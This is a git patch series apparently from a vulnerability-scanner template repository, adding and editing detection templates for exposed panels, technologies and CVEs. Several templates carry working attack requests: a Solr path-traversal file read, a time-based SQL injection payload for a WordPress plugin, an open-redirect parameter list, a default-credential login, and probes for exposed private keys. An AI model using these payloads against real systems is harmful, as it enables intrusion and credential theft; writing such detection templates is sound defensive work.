deletion(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 8b437ea797..333c4ec29e 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -2,7 +2,7 @@ id: apache-solr-file-read info: name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk, philippedelteil + author: DhiyaneshDk,philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. reference: From c8b5033ccc2ac5819c4f38f2ea93d23a7c82a2d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 09:21:51 +0530 Subject: [PATCH 0847/1415] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 333c4ec29e..a6022ab36b 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -45,7 +45,7 @@ requests: matchers: - type: word - name: "Windows" + name: "windows" words: - "Windows" - "Users" @@ -53,11 +53,11 @@ requests: condition: and - type: regex - name: "Linux" + name: "linux" regex: - "root:.*:0:0:" - type: word - name: "Other" + name: "other" words: - "java.io.FileNotFoundException" From fd270d85f66c45af7cb8bc6168075ca2439ba50f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 09:31:15 +0530 Subject: [PATCH 0848/1415] Update apache-solr-file-read.yaml --- .../apache/apache-solr-file-read.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index a6022ab36b..f24791365d 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -24,7 +24,7 @@ requests: Connection: close - | - GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 + GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../Windows/win.ini¶m=ContentStream HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close @@ -43,13 +43,15 @@ requests: regex: - '"name"\:"(.*?)"' + stop-at-first-match: true matchers: - type: word name: "windows" + part: body words: - - "Windows" - - "Users" - - "org.apache.solr.handler.DumpRequestHandler" + - "bit app support" + - "fonts" + - "extensions" condition: and - type: regex @@ -57,7 +59,6 @@ requests: regex: - "root:.*:0:0:" - - type: word - name: "other" - words: - - "java.io.FileNotFoundException" + - type: status + status: + - 200 From 11b94a1f5af0f0fac6b5266e62b0f894eeecd4f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 09:32:17 +0530 Subject: [PATCH 0849/1415] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index f24791365d..ef6252d216 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -58,7 +58,3 @@ requests: name: "linux" regex: - "root:.*:0:0:" - - - type: status - status: - - 200 From c4e1db2b770d7a51351a9535f9b8eeebb16d4888 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 10:30:45 +0530 Subject: [PATCH 0850/1415] Create routes-ini.yaml --- exposures/files/routes-ini.yaml | 47 +++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 exposures/files/routes-ini.yaml diff --git a/exposures/files/routes-ini.yaml b/exposures/files/routes-ini.yaml new file mode 100644 index 0000000000..b413ea190a --- /dev/null +++ b/exposures/files/routes-ini.yaml @@ -0,0 +1,47 @@ +id: routes-ini + +info: + name: routes.ini File Exposure + author: geeknik + severity: info + metadata: + verified: true + github-query: filename:routes.ini + google-query: intitle:"index of" "routes.ini" + tags: routes,config,exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/routes.ini" + - "{{BaseURL}}/config/routes.ini" + - "{{BaseURL}}/admin/configs/routes.ini" + - "{{BaseURL}}/application/configs/routes.ini" + - "{{BaseURL}}/aplicacao/routes/configs/routes.ini" + - "{{BaseURL}}/routes/configs/routes.ini" + - "{{BaseURL}}/cloudexp/routes/configs/routes.ini" + - "{{BaseURL}}/cms/routes/configs/routes.ini" + - "{{BaseURL}}/moto/routes/configs/routes.ini" + - "{{BaseURL}}/Partners/routes/configs/routes.ini" + - "{{BaseURL}}/radio/routes/configs/routes.ini" + - "{{BaseURL}}/seminovos/routes/configs/routes.ini" + - "{{BaseURL}}/shop/routes/configs/routes.ini" + - "{{BaseURL}}/site_cg/routes/configs/routes.ini" + - "{{BaseURL}}/slr/routes/configs/routes.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "defaults.action" + - "routes.admin" + condition: and + + - type: word + part: body + words: + - "[routes]" + - "GET /" + condition: and From 21965bc226788619473e98ddfd78fb742195e693 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 10:43:44 +0530 Subject: [PATCH 0851/1415] Create homeworks-illumination.yaml --- iot/homeworks-illumination.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 iot/homeworks-illumination.yaml diff --git a/iot/homeworks-illumination.yaml b/iot/homeworks-illumination.yaml new file mode 100644 index 0000000000..7712bba606 --- /dev/null +++ b/iot/homeworks-illumination.yaml @@ -0,0 +1,30 @@ +id: homeworks-illumination + +info: + name: HomeWorks Illumination Web Keypad + author: geeknik + severity: low + reference: + - https://www.lutron.com + metadata: + verified: true + shodan-query: html:"HomeWorks Illumination Web Keypad" + tags: misconfig,iot,homeworks + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "HomeWorks Illumination Web Keypad" + - "lutron.js" + - "Lutron HomeWorks" + condition: and + + - type: status + status: + - 200 From 81c19b5d851197d4eb5f533a070fa45a021e13b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 11:47:43 +0530 Subject: [PATCH 0852/1415] Create goliath-detect.yaml --- technologies/goliath-detect.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 technologies/goliath-detect.yaml diff --git a/technologies/goliath-detect.yaml b/technologies/goliath-detect.yaml new file mode 100644 index 0000000000..65caa159b3 --- /dev/null +++ b/technologies/goliath-detect.yaml @@ -0,0 +1,30 @@ +id: goliath-detect + +info: + name: Goliath Detection + author: geeknik + severity: info + description: | + Goliath is a non-blocking Ruby web server framework -- https://github.com/postrank-labs/goliath + metadata: + verified: true + shodan-query: 'Server: Goliath' + tags: tech,goliath + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - Goliath+ + + extractors: + - type: kval + part: header + kval: + - Server From 107a0d9da70330e08d7f379cad6a0ba5dafead2b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 11:49:49 +0530 Subject: [PATCH 0853/1415] Update goliath-detect.yaml --- technologies/goliath-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/goliath-detect.yaml b/technologies/goliath-detect.yaml index 65caa159b3..6dbf8924fe 100644 --- a/technologies/goliath-detect.yaml +++ b/technologies/goliath-detect.yaml @@ -5,7 +5,9 @@ info: author: geeknik severity: info description: | - Goliath is a non-blocking Ruby web server framework -- https://github.com/postrank-labs/goliath + Goliath is a non-blocking Ruby web server framework + reference: + - https://github.com/postrank-labs/goliath metadata: verified: true shodan-query: 'Server: Goliath' From e09bb5d47892b92e44fb6916c6959fc31a0d95e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 12:50:22 +0530 Subject: [PATCH 0854/1415] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index f9b43ced3e..bf37cb013a 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -2,16 +2,26 @@ id: putty-private-key-disclosure info: name: Putty Private Key Disclosure - author: dhiyaneshDk + author: DhiyaneshDk,geeknik severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + metadata: + verified: true + github-query: filename:putty.ppk tags: exposure,files requests: - method: GET path: - "{{BaseURL}}/my.ppk" + - "{{BaseURL}}/putty.ppk" + - "{{BaseURL}}/{{Hostname}}.ppk" + - "{{BaseURL}}/.ssh/putty.ppk" + - "{{BaseURL}}/.ssh/{{Hostname}}.ppk" + - "{{BaseURL}}/.putty/my.ppk" + - "{{BaseURL}}/.putty/putty.ppk" + - "{{BaseURL}}/.putty/{{Hostname}}.ppk" matchers-condition: and matchers: From 0e603358f53daf1aa974fc53f0328dc03a98ff70 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 12:51:21 +0530 Subject: [PATCH 0855/1415] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index bf37cb013a..2f724217a0 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -23,6 +23,7 @@ requests: - "{{BaseURL}}/.putty/putty.ppk" - "{{BaseURL}}/.putty/{{Hostname}}.ppk" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 61d8f37ccab5fbddb63ee1074bc58ce5505b32b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 13:03:13 +0530 Subject: [PATCH 0856/1415] Update open-redirect.yaml --- vulnerabilities/generic/open-redirect.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 9729aeddde..b942ab8f13 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -107,7 +107,11 @@ requests: - 'ゝinteract.sh' - 'ーinteract.sh' - 'ーinteract.sh' - - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + - '?page=interact.sh&_url=interact.sh&callback=interact.sh&destination=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&go=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect_uri=interact.sh&redirect_url=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + - 'redirect/interact.sh' + - 'cgi-bin/redirect.cgi?interact.sh' + - 'out?interact.sh' + - 'login?to=http://interact.sh' stop-at-first-match: true matchers-condition: and From 08c66dbc083ae87b2704dd75e33710ae7c1f9540 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 13:09:09 +0530 Subject: [PATCH 0857/1415] Update CVE-2022-23131.yaml --- cves/2022/CVE-2022-23131.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml index 0e182ea627..40b9b42d62 100644 --- a/cves/2022/CVE-2022-23131.yaml +++ b/cves/2022/CVE-2022-23131.yaml @@ -2,7 +2,7 @@ id: CVE-2022-23131 info: name: Zabbix - SAML SSO Authentication Bypass - author: For3stCo1d + author: For3stCo1d,spac3wh1te severity: critical description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. reference: From be4d19c5254f32c80e810bf67e71d1c8cdd17721 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 13:49:08 +0530 Subject: [PATCH 0860/1415] Update and rename technologies/influxdb-detect.yaml to exposed-panels/influxdb-panel.yaml --- .../influxdb-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/influxdb-detect.yaml => exposed-panels/influxdb-panel.yaml (94%) diff --git a/technologies/influxdb-detect.yaml b/exposed-panels/influxdb-panel.yaml similarity index 94% rename from technologies/influxdb-detect.yaml rename to exposed-panels/influxdb-panel.yaml index eadadb5ac9..0cde76ae6f 100644 --- a/technologies/influxdb-detect.yaml +++ b/exposed-panels/influxdb-panel.yaml @@ -1,4 +1,4 @@ -id: influxdb-detect +id: influxdb-panel info: name: InfluxDB Detect @@ -9,7 +9,7 @@ info: - https://www.influxdata.com/ metadata: shodan-query: http.title:"InfluxDB - Admin Interface" - tags: tech,influxdb + tags: panel,influxdb requests: - method: GET From 6d6a20a38125e82b01dc6a3b9add0e1ec8c4d711 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 13:58:25 +0530 Subject: [PATCH 0861/1415] Create influxdb-version-detect --- technologies/influxdb-version-detect | 32 ++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 technologies/influxdb-version-detect diff --git a/technologies/influxdb-version-detect b/technologies/influxdb-version-detect new file mode 100644 index 0000000000..f354948822 --- /dev/null +++ b/technologies/influxdb-version-detect @@ -0,0 +1,32 @@ +id: influxdb-version-detect + +info: + name: InfluxDB Version Detection + author: c-sh0 + severity: info + description: Obtain InfluxDB Version Information + reference: + - https://docs.influxdata.com/influxdb/v1.8/tools/api/#ping-http-endpoint + - https://github.com/influxdata/influxdb/blob/master/http/platform_handler.go#L62 + metadata: + verified: true + shodan-query: "X-Influxdb-" + tags: tech,influxdb,api + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: header + words: + - 'X-Influxdb-' + + extractors: + - type: kval + kval: + - "X_Influxdb_Version" From d1df85512a3b333191bbcbb1515be03bffd63dae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 14:10:41 +0530 Subject: [PATCH 0862/1415] Update influxdb-version-detect --- technologies/influxdb-version-detect | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/influxdb-version-detect b/technologies/influxdb-version-detect index f354948822..6cb22994e6 100644 --- a/technologies/influxdb-version-detect +++ b/technologies/influxdb-version-detect @@ -20,7 +20,6 @@ requests: matchers-condition: and matchers: - - type: word part: header words: From 07aa71d22fbc494c45515394ece0283d8eb913ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 09:11:55 +0000 Subject: [PATCH 0864/1415] Auto Generated CVE annotations [Fri Dec 2 09:11:55 UTC 2022] :robot: --- cves/2022/CVE-2022-45933.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-45933.yaml b/cves/2022/CVE-2022-45933.yaml index 03331cf381..fe9bd25e92 100644 --- a/cves/2022/CVE-2022-45933.yaml +++ b/cves/2022/CVE-2022-45933.yaml @@ -3,17 +3,20 @@ id: CVE-2022-45933 info: name: KubeView - Information disclosure author: For3stCo1d - severity: high + severity: critical description: | KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure." reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-45933 + cwe-id: CWE-287 metadata: - verified: true shodan-query: http.title:"KubeView" + verified: "true" tags: cve,cve2022,kubeview,kubernetes,exposure requests: From 02e41d6cad0dad977fdf48b14965096e9fc56951 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Fri, 2 Dec 2022 16:09:14 +0530 Subject: [PATCH 0865/1415] Added template for CVE-2022-0826 --- cves/2022/CVE-2022-0826.yaml | 42 ++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-0826.yaml diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml new file mode 100644 index 0000000000..c5b96634bd --- /dev/null +++ b/cves/2022/CVE-2022-0826.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-0826 + +info: + name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5 + - https://wordpress.org/plugins/wp-video-gallery-free/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0826 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth + +requests: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: 192.168.0.100:8888 + User-Agent: curl/7.79.1 + Accept: */* + Content-Length: 132 + Content-Type: application/x-www-form-urlencoded + Connection: close + + action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - '(contains(body, "Registred videos :") || contains(body, "duplicate"))' + condition: and \ No newline at end of file From e6cdad1c940d13008260b60f197e2e2e18755b53 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:34:02 +0530 Subject: [PATCH 0866/1415] Update nsicg-default-password.yaml --- .../nsicg/nsicg-default-password.yaml | 44 ++++++++++++------- 1 file changed, 28 insertions(+), 16 deletions(-) diff --git a/default-logins/nsicg/nsicg-default-password.yaml b/default-logins/nsicg/nsicg-default-password.yaml index b03791cb87..ef2b99cd35 100644 --- a/default-logins/nsicg/nsicg-default-password.yaml +++ b/default-logins/nsicg/nsicg-default-password.yaml @@ -1,27 +1,39 @@ id: nsicg-default-password info: - name: Nsicg Default Password + name: Ns-icg Default Password author: pikpikcu - severity: low + severity: high reference: | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 - tags: nscig,default-login + metadata: + verified: true + fofa-query: "NS-ICG" + tags: nsicg,default-login requests: - - method: POST - path: - - "{{BaseURL}}/user/login/checkPermit" - body: "usrname=ns25000&pass=ns25000" + - raw: + - | + @timeout: 25s + POST /user/login/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - matchers-condition: and + usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree= + + - | + @timeout: 25s + GET /user/main HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/user/login/ + + cookie-reuse: true + req-condition: true matchers: - - - type: word - words: - - '{"agreed":true}' + - type: dsl + dsl: + - 'contains(all_headers_1, "/user/main/")' + - 'status_code_1 == 302' + - 'status_code_2 == 200' + - contains(body_2, "var loguser = \'ns25000") condition: and - - - type: status - status: - - 200 From b88c42f75d3f8d7b6c0d4bee8b7cdd85af37eef8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:36:14 +0530 Subject: [PATCH 0867/1415] Update and rename nsicg-default-password.yaml to nsicg-default-login.yaml --- ...nsicg-default-password.yaml => nsicg-default-login.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename default-logins/nsicg/{nsicg-default-password.yaml => nsicg-default-login.yaml} (72%) diff --git a/default-logins/nsicg/nsicg-default-password.yaml b/default-logins/nsicg/nsicg-default-login.yaml similarity index 72% rename from default-logins/nsicg/nsicg-default-password.yaml rename to default-logins/nsicg/nsicg-default-login.yaml index ef2b99cd35..811cd206c8 100644 --- a/default-logins/nsicg/nsicg-default-password.yaml +++ b/default-logins/nsicg/nsicg-default-login.yaml @@ -1,9 +1,11 @@ -id: nsicg-default-password +id: nsicg-default-login info: - name: Ns-icg Default Password + name: Ns-icg Default Login author: pikpikcu severity: high + description: | + There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole. reference: | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 metadata: From 05e5630382201166f2b7a043ae95c89c054ba2c0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:48:43 +0530 Subject: [PATCH 0868/1415] Update nsicg-default-login.yaml --- default-logins/nsicg/nsicg-default-login.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/default-logins/nsicg/nsicg-default-login.yaml b/default-logins/nsicg/nsicg-default-login.yaml index 811cd206c8..efa86f6907 100644 --- a/default-logins/nsicg/nsicg-default-login.yaml +++ b/default-logins/nsicg/nsicg-default-login.yaml @@ -21,7 +21,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree= + usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree= - | @timeout: 25s @@ -29,6 +29,13 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}}/user/login/ + attack: pitchfork + payloads: + username: + - ns25000 + password: + - ns25000 + cookie-reuse: true req-condition: true matchers: From cbb187ac0449bed08211c1be61961862d2642dc7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 16:51:54 +0530 Subject: [PATCH 0869/1415] Create mikrotik-routeros-old.yaml --- exposed-panels/mikrotik-routeros-old.yaml | 31 +++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/mikrotik-routeros-old.yaml diff --git a/exposed-panels/mikrotik-routeros-old.yaml b/exposed-panels/mikrotik-routeros-old.yaml new file mode 100644 index 0000000000..a74d4a4a0c --- /dev/null +++ b/exposed-panels/mikrotik-routeros-old.yaml @@ -0,0 +1,31 @@ +id: mikrotik-routeros-old + +info: + name: MikroTik RouterOS Administration Login + author: its0x08,DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: title:"mikrotik routeros > administration" + tags: panel,login,mikrotik + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + name: router + part: body + words: + - 'mikrotik routeros > administration' + - 'configuration page' + condition: and + + extractors: + - type: regex + group: 1 + regex: + - '
mikrotik routeros (.[0-9.]+) configuration page
' From a3f5dd037f7dd34483d0ebfb4b425b5daf761615 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 11:25:05 +0000 Subject: [PATCH 0870/1415] Auto Generated New Template Addition List [Fri Dec 2 11:25:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eb83e8c5f5..07f1a88df3 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ cves/2022/CVE-2022-2034.yaml cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml cves/2022/CVE-2022-45933.yaml +default-logins/nsicg/nsicg-default-login.yaml default-logins/versa/versa-flexvnf-default-login.yaml exposed-panels/asus-router-panel.yaml exposed-panels/backpack/backpack-admin-panel.yaml From 60b29f5c1b2d66d2091caf4615b16aa46c1942d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 17:00:39 +0530 Subject: [PATCH 0871/1415] Update mikrotik-routeros-old.yaml --- exposed-panels/mikrotik-routeros-old.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/mikrotik-routeros-old.yaml b/exposed-panels/mikrotik-routeros-old.yaml index a74d4a4a0c..d4881cd084 100644 --- a/exposed-panels/mikrotik-routeros-old.yaml +++ b/exposed-panels/mikrotik-routeros-old.yaml @@ -17,7 +17,6 @@ requests: matchers-condition: and matchers: - type: word - name: router part: body words: - 'mikrotik routeros > administration' From c9e12d4811bd49c21ee3e0a6a02fb432fd845d7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 17:17:00 +0530 Subject: [PATCH 0872/1415] Create mikrotik-httpproxy.yaml --- technologies/mikrotik-httpproxy.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/mikrotik-httpproxy.yaml diff --git a/technologies/mikrotik-httpproxy.yaml b/technologies/mikrotik-httpproxy.yaml new file mode 100644 index 0000000000..74862b3847 --- /dev/null +++ b/technologies/mikrotik-httpproxy.yaml @@ -0,0 +1,23 @@ +id: mikrotik-httpproxy + +info: + name: MikroTik httpproxy + author: its0x08,DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: 'Server: mikrotik httpproxy' + tags: tech,mikrotik + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Server: Mikrotik HttpProxy' + case-insensitive: true From f9822b92c635a9d75ccbc788e7a19459dd4e3935 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 2 Dec 2022 17:19:56 +0530 Subject: [PATCH 0873/1415] Update dropbear-cbc-ciphers.yaml --- network/detection/dropbear-cbc-ciphers.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index 5aa3f4ba42..706f72f47c 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -27,3 +27,4 @@ network: - type: word words: - "cbc" + - "SSH-" From 569ad7be4ded51d94b02bc61b2c19fd8d2c12bb3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 17:20:59 +0530 Subject: [PATCH 0874/1415] Update dropbear-cbc-ciphers.yaml --- network/detection/dropbear-cbc-ciphers.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index 706f72f47c..ed808d4394 100644 --- 